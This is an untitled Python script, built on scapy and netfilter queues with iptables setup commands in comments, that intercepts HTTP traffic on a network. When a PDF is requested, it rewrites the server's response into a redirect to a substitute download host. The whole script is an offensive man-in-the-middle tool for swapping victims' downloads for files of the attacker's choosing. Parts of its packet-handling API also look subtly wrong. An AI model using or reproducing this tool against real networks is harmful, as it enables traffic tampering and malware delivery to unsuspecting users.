Untitled

#!/usr/bin/python3
# iptables -I INPUT -j NFQUEUE --queue-num 0
# iptables -I OUTPUT -j NFQUEUE --queue-num 0
# iptables -I FORWARD -j NFQUEUE --queue-num 0

from scapy.all import *

ack_list = []

def set_load(packet, load):
    packet[Raw].load = load
    del packet[IP].len
    del packet[IP].chksum
    del packet[TCP].chksum
    return packet

def process_packet(packet):
    scapy_packet = packet.get_payload()
    if scapy_packet.haslayer(Raw):
        if scapy_packet[TCP].dport == 80:
            if b".pdf" in scapy_packet[Raw].load:
                print("PDF Request")
                ack_list.append(scapy_packet[TCP].ack)
                # print(scapy_packet.show())

        elif scapy_packet[TCP].sport == 80:
            if scapy_packet[TCP].seq in ack_list:
                ack_list.remove(scapy_packet[TCP].seq)
                print('Replacing files')
                modified_packet = set_load(scapy_packet, b"HTTP/1.1 301 Moved Permanently\nLocation: http://127.0.0.1/ngrok\n\n")
                
                packet.set_payload(bytes(modified_packet))
    
    packet.accept()

queue = NFQueue()
queue.open()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    queue.unbind()
    queue.close()